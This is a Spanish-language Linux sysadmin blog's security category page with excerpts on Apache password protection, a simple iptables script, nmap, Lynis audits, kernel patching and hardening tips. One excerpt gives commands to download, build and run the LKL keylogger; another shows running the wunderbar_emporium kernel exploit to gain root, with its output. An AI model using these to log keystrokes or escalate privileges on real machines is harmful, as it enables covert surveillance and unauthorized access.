Seguridad | Linuxadmin

Directorios de Apache con contraseña

Hace tiempo, al instalar squid se me ocurrió instalar también los reportes de squid, el problema era que lo podía ver todo el mundo, cosa que no interesaba, así que lo mejor es tener ciertos datos protegidos con contraseña para que los vean ciertas personas simplemente.

La situación es la siguiente, tenemos la carpeta /var/www/noteloquieroenseñar/ que esta disponible para todos pero queremos que no. Así que empezamos:

El comando siguiente nos crea el archivo y un usuario, es como el comando adduser Continued…

Keylogger para Linux, LKL

Se que no esta bien, pero dejo la información, es un paquete llamado LKL, data del 2005 pero hace su trabajo y funciona. Para el que no sepa lo que haces este programa, captura todos los movimientos que haces con el teclado a grandes rasgos. Para instalar:

#wget http://switch.dl.sourceforge.net/project/lkl/lkl-0.1.1/lkl-0.1.1/lkl-0.1.1.tar.gz

#tar xvf lkl-0.1.1.tar.gz

#cd lkl

#./configure

#make && sudo make install

Listo, para usar:

#lkl -l -k keymaps/us_km -o captura.txt

Script de iptables sencillo

Esto es un script sencillo que fácilmente podéis adaptar a vuestro ordenador. Es algo sencillo para todo el mundo.

#!/bin/bash iptables -F iptables -X iptables -Z iptables -t nat -F iptables -A INPUT -p tcp –dport 53 -j DROP iptables -A INPUT -p tcp –dport 106 -j DROP iptables -A INPUT -p tcp –dport 110 -j DROP iptables -A INPUT -p tcp –dport 995 -j DROP iptables -A INPUT -s 127.0.0.1 -p tcp –dport 3306 -j ACCEPT iptables -A INPUT -p tcp –dport 3306 -j DROP

echo ” Todo ok : `iptables -L -n`”

Como podéis ver se deniega el puerto 53, 106, 110, 995 y al puerto 3306 solo le llegan las conexiones del localhost, la ultima linea muestra lo que hemos hecho en nuestro iptables. En futuros posts lo complicaremos más.

Viendo las puertas abiertas con nmap

Si creéis que vuestro servidor es seguro deberíais de probar esta herramienta llamada nmap y ver que seguramente tengas alguna puerta trasera que no debería de estar abierta.

insecurelogo-eye-90x168-5102420

La podréis encontrar en los repositorios fácilmente pero si no la tenéis deberéis de hacer la formula mágica:

Continued…

Lynis, auditoría en Linux

Hacía tiempo que no se hablaba de seguridad así que ya era hora. Hablaremos de lynis, una ayuda que nos permite detectar configuraciones con vulnerabilidades.

Este software lo podremos encontrar en los repositorios de cualquier distro, si no os lo bajáis de la pagina. Para ejecutarlo, ejecutar el siguiente comando:

#lynis –check-all

Según escanee los apartados tendremos que pulsar la tecla intro para continuar. Como veis hace un análisis bastante profundo tocando varias partes. Al final de todo obtendremos una parte que pondrá peligros y otra sugerencias. Podréis ver el log de esto en /var/log/lynis.log.

Continued…

Avast Linux Home Edition en OpenSuse

Avast nos ofrece soluciones para los usuarios de Linux, hoy veremos la versión de casa. La podremos descargar de aquí. Como veréis tenemos rpm, deb y el clásico tar.gz. Como estoy en OpenSuse no iba a complicarme así que me baje la rpm.

Después de instalarlo con doble click, hoy no me quería complicar con la terminal, se instalo correctamente.

En el menú kde lo tenía así que presupongo que para los escritorios gnome también debe de estar ahí. Lo promero que nos pedira será una clave, la podremos conseguir registrándonos en la pagina de avast, vamos como en la versión de Windows.

Continued…

Como parchear el kernel

Algo que hay que hacer para evitar cosas como, fallos de seguridad, nuevas funcionalidades y demás menesteres. Es un proceso sencillo que cualquiera puede hacer. Necesitamos un kernel que hayamos compilado nosotros mismos, si no no funcionara.

Empezamos bajando el path de la pagina de kernel.org, una vez bajado lo movemos a la carpeta /usr/src

#mv patch-2.6.31.5.bz2 /usr/src

Lo descomprimimos

#bzip2 -d patch-2.6.X.bz2

Y por último aplicamos el parcho con el comando patch

# patch -p0 < patch-2.6.31.5

Actuliza tu kernel, cualquiera puede ser root

Recientemente salio un bug en el kernel de linux que podría alguien entrar al sistema con permisos de root, bien pues he probado este fallo con una Slackware 12.2 con el kernel: 2.6.27.7 y lo revienta en 3 segundos más o menos.

Esto quiero que quede claro que es con fines educativos. El software lo encontre con el nombre wunderbar_emporium. Los pasos como siempre descomprimimos:

#tar xvf wunderbar_emporium.tgz

Y ejecutamos el .sh

# ./wunderbar_emporium.sh [+] MAPPED ZERO PAGE! [+] got ring0! [+] detected 2.6 style 8k stacks sh: mplayer: command not found [+] Disabled security of : nothing, what an insecure machine! [+] Got root!

sh-3.1#

La gracia de esto es que lo proveis siendo un usuario sin privilegios.

Mejora tu contraseña de tuenti

El viernes me encontré con este genial articulo de Security By Default, sobre tuenti, y como con un simple programa en python, concretamente wfuzz, podrías sacar la contraseña de tuenti en cuestión de tiempo. El problema deriva de que tuenti tiene la peculiar caracterisitca de que permite logeos erróneos ilimitados.

Por ejemplo si vuestra contraseña solo tiene números, con un simple comando podrían sacaros la contraseña en una hora.

No voy a explicar como hacerlo, pero solo quiero avisar. Poned mayusculas, números y algun caracter raro tipo: |@#&%$”. Os evitará problemas. Esperemos que esto se solucione.

Añadiendo seguridad a Linux

Añadir seguridad a Linux

Cambiar los puertos de escucha de las aplicaciones

Abrir los puertos justos y necesarios en el router

Si no necesitamos entrar como root en ssh, podemos desactivar el usuario root

Utilizar acl’s podemos dar a un usuario la posibilidad de hacer un ifconfig sin ser root

Iptables bien configurado

Con inguma o metasploit framework (este tiene versión para Windows) ver la seguridad en cuanto ataques de penetración

Contraseñas con caracteres especiales (cuidado con la distribucion del teclado) faciles de recordar pero dificiles de adivinar

Buena gestión de backup incrementales con copia completa el fin de semana por ejemplo con atención especial al /etc (donde se guardan los archivos de configuración)

Raid 0 para el sistema operativo, para lo demas un Raid 5 esta bien

Desactivar telnet

Contraseña en bios y cargador de arranque

No instalar nada que no vallemos a usar

Actualizar el kernel con versiones estables

Lectura correcta de los logs que van enviando las aplicaciones con atención especial a /var/log/auth.log

Y lo más importante, hacer descansos, si nos saturamos, nos equivocaremos